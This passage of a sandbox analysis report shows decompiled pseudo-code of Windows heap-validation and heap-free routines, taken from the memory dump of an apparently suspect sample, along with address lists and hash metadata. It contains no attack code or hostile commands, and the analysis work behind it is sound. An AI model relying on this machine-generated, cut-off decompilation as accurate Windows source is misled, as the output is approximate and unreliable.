                                                        						_v28 = _t325;
                                                        						_v5 = _t156;
                                                        						__eflags = _t156 & 0x00000001;
                                                        						if((_t156 & 0x00000001) != 0) {
                                                        							_t157 =  *[fs:0x30];
                                                        							__eflags =  *(_t157 + 0xc);
                                                        							if( *(_t157 + 0xc) == 0) {
                                                        								_push("HEAP: ");
                                                        								E017EB150();
                                                        							} else {
                                                        								E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        							}
                                                        							_push(_t325);
                                                        							E017EB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
                                                        							L32:
                                                        							_t270 = 0;
                                                        							__eflags = _t331[0x13];
                                                        							if(_t331[0x13] != 0) {
                                                        								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
                                                        								 *_t325 =  *_t325 ^ _t331[0x14];
                                                        							}
                                                        							L60:
                                                        							_t267 = _t270 + 1;
                                                        							__eflags = _t267;
                                                        							goto L61;
                                                        						}
                                                        						_t169 =  *_t325 & 0x0000ffff;
                                                        						__eflags = _t169 - _t308;
                                                        						if(_t169 < _t308) {
                                                        							_t170 =  *[fs:0x30];
                                                        							__eflags =  *(_t170 + 0xc);
                                                        							if( *(_t170 + 0xc) == 0) {
                                                        								_push("HEAP: ");
                                                        								E017EB150();
                                                        							} else {
                                                        								E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        							}
                                                        							E017EB150("Non-Dedicated free list element %p is out of order\n", _t325);
                                                        							goto L32;
                                                        						} else {
                                                        							__eflags = _t331[0x13];
                                                        							_t308 = _t169;
                                                        							_v24 = _t308;
                                                        							if(_t331[0x13] != 0) {
                                                        								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
                                                        								 *_t325 =  *_t325 ^ _t331[0x14];
                                                        								__eflags =  *_t325;
                                                        							}
                                                        							_t26 =  &_v32;
                                                        							 *_t26 = _v32 + 1;
                                                        							__eflags =  *_t26;
                                                        							continue;
                                                        						}
                                                        					}
                                                        					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
                                                        					if( *0x18d6350 != 0 && _t331[0x2f] != 0) {
                                                        						_push(4);
                                                        						_push(0x1000);
                                                        						_push( &_v16);
                                                        						_push(0);
                                                        						_push( &_v12);
                                                        						_push(0xffffffff);
                                                        						if(E01829660() >= 0) {
                                                        							_v20 = _v12 + 0x204;
                                                        						}
                                                        					}
                                                        					_t183 =  &(_t331[0x27]);
                                                        					_t281 = 0x81;
                                                        					_t326 =  *_t183;
                                                        					if(_t183 == _t326) {
                                                        						L49:
                                                        						_t261 =  &(_t331[0x29]);
                                                        						_t184 = 0;
                                                        						_t327 =  *_t261;
                                                        						_t282 = 0;
                                                        						_v24 = 0;
                                                        						_v36 = 0;
                                                        						__eflags = _t327 - _t261;
                                                        						if(_t327 == _t261) {
                                                        							L53:
                                                        							_t328 = _v32;
                                                        							_v28 = _t331;
                                                        							__eflags = _t328 - _t184;
                                                        							if(_t328 == _t184) {
                                                        								__eflags = _t331[0x1d] - _t282;
                                                        								if(_t331[0x1d] == _t282) {
                                                        									__eflags = _v12;
                                                        									if(_v12 == 0) {
                                                        										L82:
                                                        										_t267 = 1;
                                                        										__eflags = 1;
                                                        										goto L83;
                                                        									}
                                                        									_t329 = _t331[0x2f];
                                                        									__eflags = _t329;
                                                        									if(_t329 == 0) {
                                                        										L77:
                                                        										_t330 = _t331[0x22];
                                                        										__eflags = _t330;
                                                        										if(_t330 == 0) {
                                                        											L81:
                                                        											_t129 =  &_v16;
                                                        											 *_t129 = _v16 & 0x00000000;
                                                        											__eflags =  *_t129;
                                                        											E0181174B( &_v12,  &_v16, 0x8000);
                                                        											goto L82;
                                                        										}
                                                        										_t314 = _t331[0x21] & 0x0000ffff;
                                                        										_t285 = 1;
                                                        										__eflags = 1 - _t314;
                                                        										if(1 >= _t314) {
                                                        											goto L81;
                                                        										} else {
                                                        											goto L79;
                                                        										}
                                                        										while(1) {
                                                        											L79:
                                                        											_t330 = _t330 + 0x40;
                                                        											_t332 = _t285 & 0x0000ffff;
                                                        											_t262 = _v20 + _t332 * 4;
                                                        											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
                                                        											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
                                                        												break;
                                                        											}
                                                        											_t285 = _t285 + 1;
                                                        											__eflags = _t285 - _t314;
                                                        											if(_t285 < _t314) {
                                                        												continue;
                                                        											}
                                                        											goto L81;
                                                        										}
                                                        										_t191 =  *[fs:0x30];
                                                        										__eflags =  *(_t191 + 0xc);
                                                        										if( *(_t191 + 0xc) == 0) {
                                                        											_push("HEAP: ");
                                                        											E017EB150();
                                                        										} else {
                                                        											E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        										}
                                                        										_push(_t262);
                                                        										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
                                                        										_t148 = _t330 + 0x10; // 0x10
                                                        										_push( *((intOrPtr*)(_t330 + 8)));
                                                        										E017EB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
                                                        										L59:
                                                        										_t270 = 0;
                                                        										__eflags = 0;
                                                        										goto L60;
                                                        									}
                                                        									_t289 = 1;
                                                        									__eflags = 1;
                                                        									while(1) {
                                                        										_t201 = _v12;
                                                        										_t329 = _t329 + 0xc;
                                                        										_t263 = _t289 & 0x0000ffff;
                                                        										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
                                                        										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
                                                        											break;
                                                        										}
                                                        										_t289 = _t289 + 1;
                                                        										__eflags = _t289 - 0x81;
                                                        										if(_t289 < 0x81) {
                                                        											continue;
                                                        										}
                                                        										goto L77;
                                                        									}
                                                        									_t203 =  *[fs:0x30];
                                                        									__eflags =  *(_t203 + 0xc);
                                                        									if( *(_t203 + 0xc) == 0) {
                                                        										_push("HEAP: ");
                                                        										E017EB150();
                                                        									} else {
                                                        										E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        									}
                                                        									_t291 = _v12;
                                                        									_push(_t291 + _t263 * 4);
                                                        									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
                                                        									_push( *((intOrPtr*)(_t329 + 8)));
                                                        									E017EB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
                                                        									goto L59;
                                                        								}
                                                        								_t212 =  *[fs:0x30];
                                                        								__eflags =  *(_t212 + 0xc);
                                                        								if( *(_t212 + 0xc) == 0) {
                                                        									_push("HEAP: ");
                                                        									E017EB150();
                                                        								} else {
                                                        									E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        								}
                                                        								_push(_t331[0x1d]);
                                                        								_push(_v36);
                                                        								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
                                                        								L58:
                                                        								E017EB150();
                                                        								goto L59;
                                                        							}
                                                        							_t220 =  *[fs:0x30];
                                                        							__eflags =  *(_t220 + 0xc);
                                                        							if( *(_t220 + 0xc) == 0) {
                                                        								_push("HEAP: ");
                                                        								E017EB150();
                                                        							} else {
                                                        								E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        							}
                                                        							_push(_t328);
                                                        							_push(_v24);
                                                        							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                                                        							goto L58;
                                                        						} else {
                                                        							goto L50;
                                                        						}
                                                        						while(1) {
                                                        							L50:
                                                        							_t92 = _t327 - 0x10; // -24
                                                        							_t282 = _t331;
                                                        							_t230 = E018A4AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
                                                        							__eflags = _t230;
                                                        							if(_t230 == 0) {
                                                        								goto L59;
                                                        							}
                                                        							_t327 =  *_t327;
                                                        							__eflags = _t327 - _t261;
                                                        							if(_t327 != _t261) {
                                                        								continue;
                                                        							}
                                                        							_t184 = _v24;
                                                        							_t282 = _v36;
                                                        							goto L53;
                                                        						}
                                                        						goto L59;
                                                        					} else {
                                                        						while(1) {
                                                        							_t39 = _t326 + 0x18; // 0x10
                                                        							_t264 = _t39;
                                                        							if(_t331[0x13] != 0) {
                                                        								_t319 = _t331[0x14] ^  *_t264;
                                                        								 *_t264 = _t319;
                                                        								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
                                                        								_t348 = _t319 >> 0x18 - _t303;
                                                        								if(_t319 >> 0x18 != _t303) {
                                                        									_push(_t303);
                                                        									E0189FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
                                                        								}
                                                        								_t281 = 0x81;
                                                        							}
                                                        							_t317 = _v20;
                                                        							if(_t317 != 0) {
                                                        								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
                                                        								_t350 = _t241;
                                                        								if(_t350 != 0) {
                                                        									if(_t350 >= 0) {
                                                        										__eflags = _t241 & 0x00000800;
                                                        										if(__eflags == 0) {
                                                        											__eflags = _t241 - _t331[0x21];
                                                        											if(__eflags < 0) {
                                                        												_t298 = _t241;
                                                        												_t65 = _t317 + _t298 * 4;
                                                        												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
                                                        												__eflags =  *_t65;
                                                        											}
                                                        										}
                                                        									} else {
                                                        										_t244 = _t241 & 0x00007fff;
                                                        										if(_t244 < _t281) {
                                                        											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E018923E3(_t331, _t264) == 0) {
                                                        								break;
                                                        							}
                                                        							if(_t331[0x13] != 0) {
                                                        								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
                                                        								 *_t264 =  *_t264 ^ _t331[0x14];
                                                        							}
                                                        							_t326 =  *_t326;
                                                        							if( &(_t331[0x27]) == _t326) {
                                                        								goto L49;
                                                        							} else {
                                                        								_t281 = 0x81;
                                                        								continue;
                                                        							}
                                                        						}
                                                        						__eflags = _t331[0x13];
                                                        						if(_t331[0x13] != 0) {
                                                        							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
                                                        							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
                                                        						}
                                                        						goto L65;
                                                        					}
                                                        				} else {
                                                        					L83:
                                                        					return _t267;
                                                        				}
                                                        			}
                                                        0x018a463c
                                                        0x018a4640
                                                        0x018a465f
                                                        0x018a4664
                                                        0x018a4642
                                                        0x018a4657
                                                        0x018a465c
                                                        0x018a4670
                                                        0x00000000
                                                        0x018a4542
                                                        0x018a4542
                                                        0x018a4546
                                                        0x018a4548
                                                        0x018a454b
                                                        0x018a4555
                                                        0x018a455b
                                                        0x018a455b
                                                        0x018a455b
                                                        0x018a455d
                                                        0x018a455d
                                                        0x018a455d
                                                        0x00000000
                                                        0x018a455d
                                                        0x018a453c
                                                        0x018a4579
                                                        0x018a457c
                                                        0x018a4587
                                                        0x018a4589
                                                        0x018a4591
                                                        0x018a4592
                                                        0x018a4597
                                                        0x018a4598
                                                        0x018a45a1
                                                        0x018a45ab
                                                        0x018a45ab
                                                        0x018a45a1
                                                        0x018a45ae
                                                        0x018a45b4
                                                        0x018a45b9
                                                        0x018a45bd
                                                        0x018a4759
                                                        0x018a4759
                                                        0x018a475f
                                                        0x018a4761
                                                        0x018a4763
                                                        0x018a4765
                                                        0x018a4768
                                                        0x018a476b
                                                        0x018a476d
                                                        0x018a479c
                                                        0x018a479c
                                                        0x018a479f
                                                        0x018a47a2
                                                        0x018a47a4
                                                        0x018a4830
                                                        0x018a4833
                                                        0x018a4879
                                                        0x018a487d
                                                        0x018a48f1
                                                        0x018a48f3
                                                        0x018a48f3
                                                        0x00000000
                                                        0x018a48f3
                                                        0x018a487f
                                                        0x018a4885
                                                        0x018a4887
                                                        0x018a48a8
                                                        0x018a48a8
                                                        0x018a48ae
                                                        0x018a48b0
                                                        0x018a48dc
                                                        0x018a48dc
                                                        0x018a48dc
                                                        0x018a48dc
                                                        0x018a48ec
                                                        0x00000000
                                                        0x018a48ec
                                                        0x018a48b2
                                                        0x018a48bc
                                                        0x018a48be
                                                        0x018a48c1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x018a48c3
                                                        0x018a48c3
                                                        0x018a48c6
                                                        0x018a48c9
                                                        0x018a48cc
                                                        0x018a48d1
                                                        0x018a48d4
                                                        0x00000000
                                                        0x00000000
                                                        0x018a48d6
                                                        0x018a48d7
                                                        0x018a48da
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x018a48da
                                                        0x018a494f
                                                        0x018a4955
                                                        0x018a4959
                                                        0x018a4978
                                                        0x018a497d
                                                        0x018a495b
                                                        0x018a4970
                                                        0x018a4975
                                                        0x018a4986
                                                        0x018a4987
                                                        0x018a498a
                                                        0x018a498d
                                                        0x018a4997
                                                        0x018a47ef
                                                        0x018a47ef
                                                        0x018a47ef
                                                        0x00000000
                                                        0x018a47ef
                                                        0x018a4890
                                                        0x018a4890
                                                        0x018a4891
                                                        0x018a4891
                                                        0x018a4894
                                                        0x018a4897
                                                        0x018a489d
                                                        0x018a48a0
                                                        0x00000000
                                                        0x00000000
                                                        0x018a48a2
                                                        0x018a48a3
                                                        0x018a48a6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x018a48a6
                                                        0x018a48fb
                                                        0x018a4901
                                                        0x018a4905
                                                        0x018a4924
                                                        0x018a4929
                                                        0x018a4907
                                                        0x018a491c
                                                        0x018a4921
                                                        0x018a492f
                                                        0x018a4935
                                                        0x018a4936
                                                        0x018a4939
                                                        0x018a4942
                                                        0x00000000
                                                        0x018a4947
                                                        0x018a4835
                                                        0x018a483b
                                                        0x018a483f
                                                        0x018a485e
                                                        0x018a4863
                                                        0x018a4841
                                                        0x018a4856
                                                        0x018a485b
                                                        0x018a4869
                                                        0x018a486c
                                                        0x018a486f
                                                        0x018a47e7
                                                        0x018a47e7
                                                        0x00000000
                                                        0x018a47ec
                                                        0x018a47aa
                                                        0x018a47b0
                                                        0x018a47b4
                                                        0x018a47d3
                                                        0x018a47d8
                                                        0x018a47b6
                                                        0x018a47cb
                                                        0x018a47d0
                                                        0x018a47de
                                                        0x018a47df
                                                        0x018a47e2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x018a476f
                                                        0x018a476f
                                                        0x018a4778
                                                        0x018a4785
                                                        0x018a4787
                                                        0x018a478c
                                                        0x018a478e
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4790
                                                        0x018a4792
                                                        0x018a4794
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4796
                                                        0x018a4799
                                                        0x00000000
                                                        0x018a4799
                                                        0x00000000
                                                        0x018a45c3
                                                        0x018a45c3
                                                        0x018a45c7
                                                        0x018a45c7
                                                        0x018a45ca
                                                        0x018a45cf
                                                        0x018a45d3
                                                        0x018a45df
                                                        0x018a45e4
                                                        0x018a45e6
                                                        0x018a45e8
                                                        0x018a45ed
                                                        0x018a45ed
                                                        0x018a45f2
                                                        0x018a45f2
                                                        0x018a45f7
                                                        0x018a45fc
                                                        0x018a4602
                                                        0x018a4606
                                                        0x018a4609
                                                        0x018a460f
                                                        0x018a46de
                                                        0x018a46e3
                                                        0x018a46e5
                                                        0x018a46ec
                                                        0x018a46ee
                                                        0x018a46f6
                                                        0x018a46f6
                                                        0x018a46f6
                                                        0x018a46f6
                                                        0x018a46ec
                                                        0x018a4615
                                                        0x018a4615
                                                        0x018a461d
                                                        0x018a462e
                                                        0x018a462e
                                                        0x018a461d
                                                        0x018a460f
                                                        0x018a4609
                                                        0x018a46fd
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4710
                                                        0x018a471a
                                                        0x018a4720
                                                        0x018a4720
                                                        0x018a4722
                                                        0x018a472c
                                                        0x00000000
                                                        0x018a472e
                                                        0x018a472e
                                                        0x00000000
                                                        0x018a472e
                                                        0x018a472c
                                                        0x018a4738
                                                        0x018a473c
                                                        0x018a474b
                                                        0x018a4751
                                                        0x018a4751
                                                        0x00000000
                                                        0x018a473c
                                                        0x018a48f4
                                                        0x018a48f4
                                                        0x00000000
                                                        0x018a48f4

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                        • API String ID: 0-1357697941
                                                        • Opcode ID: 6ec5c21b1e3c52f46aed1a919360d9ac7a3140391da13e4e612b8f2093c3458b
                                                        • Instruction ID: f46a267a38d8e0faf51def5d74db4e86e43f702c9342c66056d44ed13ec60d9e
                                                        • Opcode Fuzzy Hash: 6ec5c21b1e3c52f46aed1a919360d9ac7a3140391da13e4e612b8f2093c3458b
                                                        • Instruction Fuzzy Hash: 41F1FE3160064ADFEF25CB6DC488BAAFBF5FF08714F988019E186D7641D7B0AA45CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 72%
                                                        			E0180A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
                                                        				char _v8;
                                                        				signed short _v12;
                                                        				signed short _v16;
                                                        				signed int _v20;
                                                        				signed int _v24;
                                                        				signed short _v28;
                                                        				signed int _v32;
                                                        				signed int _v36;
                                                        				signed int _v40;
                                                        				signed int _v44;
                                                        				signed int _v48;
                                                        				unsigned int _v52;
                                                        				signed int _v56;
                                                        				void* _v60;
                                                        				intOrPtr _v64;
                                                        				void* _v72;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __ebp;
                                                        				unsigned int _t246;
                                                        				signed char _t247;
                                                        				signed short _t249;
                                                        				unsigned int _t256;
                                                        				signed int _t262;
                                                        				signed int _t265;
                                                        				signed int _t266;
                                                        				signed int _t267;
                                                        				intOrPtr _t270;
                                                        				signed int _t280;
                                                        				signed int _t286;
                                                        				signed int _t289;
                                                        				intOrPtr _t290;
                                                        				signed int _t291;
                                                        				signed int _t317;
                                                        				signed short _t320;
                                                        				intOrPtr _t327;
                                                        				signed int _t339;
                                                        				signed int _t344;
                                                        				signed int _t347;
                                                        				intOrPtr _t348;
                                                        				signed int _t350;
                                                        				signed int _t352;
                                                        				signed int _t353;
                                                        				signed int _t356;
                                                        				intOrPtr _t357;
                                                        				intOrPtr _t366;
                                                        				signed int _t367;
                                                        				signed int _t370;
                                                        				intOrPtr _t371;
                                                        				signed int _t372;
                                                        				signed int _t394;
                                                        				signed short _t402;
                                                        				intOrPtr _t404;
                                                        				intOrPtr _t415;
                                                        				signed int _t430;
                                                        				signed int _t433;
                                                        				signed int _t437;
                                                        				signed int _t445;
                                                        				signed short _t446;
                                                        				signed short _t449;
                                                        				signed short _t452;
                                                        				signed int _t455;
                                                        				signed int _t460;
                                                        				signed short* _t468;
                                                        				signed int _t480;
                                                        				signed int _t481;
                                                        				signed int _t483;
                                                        				intOrPtr _t484;
                                                        				signed int _t491;
                                                        				unsigned int _t506;
                                                        				unsigned int _t508;
                                                        				signed int _t513;
                                                        				signed int _t514;
                                                        				signed int _t521;
                                                        				signed short* _t533;
                                                        				signed int _t541;
                                                        				signed int _t543;
                                                        				signed int _t546;
                                                        				unsigned int _t551;
                                                        				signed int _t553;
                                                        
                                                        				_t450 = __ecx;
                                                        				_t553 = __ecx;
                                                        				_t539 = __edx;
                                                        				_v28 = 0;
                                                        				_v40 = 0;
                                                        				if(( *(__ecx + 0xcc) ^  *0x18d8a68) != 0) {
                                                        					_push(_a4);
                                                        					_t513 = __edx;
                                                        					L11:
                                                        					_t246 = E0180A830(_t450, _t513);
                                                        					L7:
                                                        					return _t246;
                                                        				}
                                                        				if(_a8 != 0) {
                                                        					__eflags =  *(__edx + 2) & 0x00000008;
                                                        					if(( *(__edx + 2) & 0x00000008) != 0) {
                                                        						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
                                                        						_t430 = E0180DF24(__edx,  &_v12,  &_v16);
                                                        						__eflags = _t430;
                                                        						if(_t430 != 0) {
                                                        							_t157 = _t553 + 0x234;
                                                        							 *_t157 =  *(_t553 + 0x234) - _v16;
                                                        							__eflags =  *_t157;
                                                        						}
                                                        					}
                                                        					_t445 = _a4;
                                                        					_t514 = _t539;
                                                        					_v48 = _t539;
                                                        					L14:
                                                        					_t247 =  *((intOrPtr*)(_t539 + 6));
                                                        					__eflags = _t247;
                                                        					if(_t247 == 0) {
                                                        						_t541 = _t553;
                                                        					} else {
                                                        						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
                                                        						__eflags = _t541;
                                                        					}
                                                        					_t249 = 7 + _t445 * 8 + _t514;
                                                        					_v12 = _t249;
                                                        					__eflags =  *_t249 - 3;
                                                        					if( *_t249 == 3) {
                                                        						_v16 = _t514 + _t445 * 8 + 8;
                                                        						E017E9373(_t553, _t514 + _t445 * 8 + 8);
                                                        						_t452 = _v16;
                                                        						_v28 =  *(_t452 + 0x10);
                                                        						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
                                                        						_v36 =  *(_t452 + 0x14);
                                                        						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
                                                        						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
                                                        						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
                                                        						_t256 =  *(_t452 + 0x14);
                                                        						__eflags = _t256 - 0x7f000;
                                                        						if(_t256 >= 0x7f000) {
                                                        							_t142 = _t553 + 0x1ec;
                                                        							 *_t142 =  *(_t553 + 0x1ec) - _t256;
                                                        							__eflags =  *_t142;
                                                        							_t256 =  *(_t452 + 0x14);
                                                        						}
                                                        						_t513 = _v48;
                                                        						_t445 = _t445 + (_t256 >> 3) + 0x20;
                                                        						_a4 = _t445;
                                                        						_v40 = 1;
                                                        					} else {
                                                        						_t27 =  &_v36;
                                                        						 *_t27 = _v36 & 0x00000000;
                                                        						__eflags =  *_t27;
                                                        					}
                                                        					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
                                                        					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
                                                        						_v44 = _t513;
                                                        						_t262 = E017EA9EF(_t541, _t513);
                                                        						__eflags = _a8;
                                                        						_v32 = _t262;
                                                        						if(_a8 != 0) {
                                                        							__eflags = _t262;
                                                        							if(_t262 == 0) {
                                                        								goto L19;
                                                        							}
                                                        						}
                                                        						__eflags =  *0x18d8748 - 1;
                                                        						if( *0x18d8748 >= 1) {
                                                        							__eflags = _t262;
                                                        							if(_t262 == 0) {
                                                        								_t415 =  *[fs:0x30];
                                                        								__eflags =  *(_t415 + 0xc);
                                                        								if( *(_t415 + 0xc) == 0) {
                                                        									_push("HEAP: ");
                                                        									E017EB150();
                                                        								} else {
                                                        									E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        								}
                                                        								_push("(UCRBlock != NULL)");
                                                        								E017EB150();
                                                        								__eflags =  *0x18d7bc8;
                                                        								if( *0x18d7bc8 == 0) {
                                                        									__eflags = 1;
                                                        									E018A2073(_t445, 1, _t541, 1);
                                                        								}
                                                        								_t513 = _v48;
                                                        								_t445 = _a4;
                                                        							}
                                                        						}
                                                        						_t350 = _v40;
                                                        						_t480 = _t445 << 3;
                                                        						_v20 = _t480;
                                                        						_t481 = _t480 + _t513;
                                                        						_v24 = _t481;
                                                        						__eflags = _t350;
                                                        						if(_t350 == 0) {
                                                        							_t481 = _t481 + 0xfffffff0;
                                                        							__eflags = _t481;
                                                        						}
                                                        						_t483 = (_t481 & 0xfffff000) - _v44;
                                                        						__eflags = _t483;
                                                        						_v52 = _t483;
                                                        						if(_t483 == 0) {
                                                        							__eflags =  *0x18d8748 - 1;
                                                        							if( *0x18d8748 < 1) {
                                                        								goto L9;
                                                        							}
                                                        							__eflags = _t350;
                                                        							goto L146;
                                                        						} else {
                                                        							_t352 = E0181174B( &_v44,  &_v52, 0x4000);
                                                        							__eflags = _t352;
                                                        							if(_t352 < 0) {
                                                        								goto L94;
                                                        							}
                                                        							_t353 = E01807D50();
                                                        							_t447 = 0x7ffe0380;
                                                        							__eflags = _t353;
                                                        							if(_t353 != 0) {
                                                        								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                        							} else {
                                                        								_t356 = 0x7ffe0380;
                                                        							}
                                                        							__eflags =  *_t356;
                                                        							if( *_t356 != 0) {
                                                        								_t357 =  *[fs:0x30];
                                                        								__eflags =  *(_t357 + 0x240) & 0x00000001;
                                                        								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
                                                        									E018A14FB(_t447, _t553, _v44, _v52, 5);
                                                        								}
                                                        							}
                                                        							_t358 = _v32;
                                                        							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                                        							_t484 =  *((intOrPtr*)(_v32 + 0x14));
                                                        							__eflags = _t484 - 0x7f000;
                                                        							if(_t484 >= 0x7f000) {
                                                        								_t90 = _t553 + 0x1ec;
                                                        								 *_t90 =  *(_t553 + 0x1ec) - _t484;
                                                        								__eflags =  *_t90;
                                                        							}
                                                        							E017E9373(_t553, _t358);
                                                        							_t486 = _v32;
                                                        							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
                                                        							E017E9819(_t486);
                                                        							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
                                                        							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
                                                        							_t366 =  *((intOrPtr*)(_v32 + 0x14));
                                                        							__eflags = _t366 - 0x7f000;
                                                        							if(_t366 >= 0x7f000) {
                                                        								_t104 = _t553 + 0x1ec;
                                                        								 *_t104 =  *(_t553 + 0x1ec) + _t366;
                                                        								__eflags =  *_t104;
                                                        							}
                                                        							__eflags = _v40;
                                                        							if(_v40 == 0) {
                                                        								_t533 = _v52 + _v44;
                                                        								_v32 = _t533;
                                                        								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
                                                        								__eflags = _v24 - _v52 + _v44;
                                                        								if(_v24 == _v52 + _v44) {
                                                        									__eflags =  *(_t553 + 0x4c);
                                                        									if( *(_t553 + 0x4c) != 0) {
                                                        										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
                                                        										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
                                                        									}
                                                        								} else {
                                                        									_t449 = 0;
                                                        									_t533[3] = 0;
                                                        									_t533[1] = 0;
                                                        									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
                                                        									_t491 = _t394;
                                                        									 *_t533 = _t394;
                                                        									__eflags =  *0x18d8748 - 1; // 0x0
                                                        									if(__eflags >= 0) {
                                                        										__eflags = _t491 - 1;
                                                        										if(_t491 <= 1) {
                                                        											_t404 =  *[fs:0x30];
                                                        											__eflags =  *(_t404 + 0xc);
                                                        											if( *(_t404 + 0xc) == 0) {
                                                        												_push("HEAP: ");
                                                        												E017EB150();
                                                        											} else {
                                                        												E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        											}
                                                        											_push("((LONG)FreeEntry->Size > 1)");
                                                        											E017EB150();
                                                        											_pop(_t491);
                                                        											__eflags =  *0x18d7bc8 - _t449; // 0x0
                                                        											if(__eflags == 0) {
                                                        												__eflags = 0;
                                                        												_t491 = 1;
                                                        												E018A2073(_t449, 1, _t541, 0);
                                                        											}
                                                        											_t533 = _v32;
                                                        										}
                                                        									}
                                                        									_t533[1] = _t449;
                                                        									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                                        									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
                                                        										_t402 = (_t533 - _t541 >> 0x10) + 1;
                                                        										_v16 = _t402;
                                                        										__eflags = _t402 - 0xfe;
                                                        										if(_t402 >= 0xfe) {
                                                        											_push(_t491);
                                                        											_push(_t449);
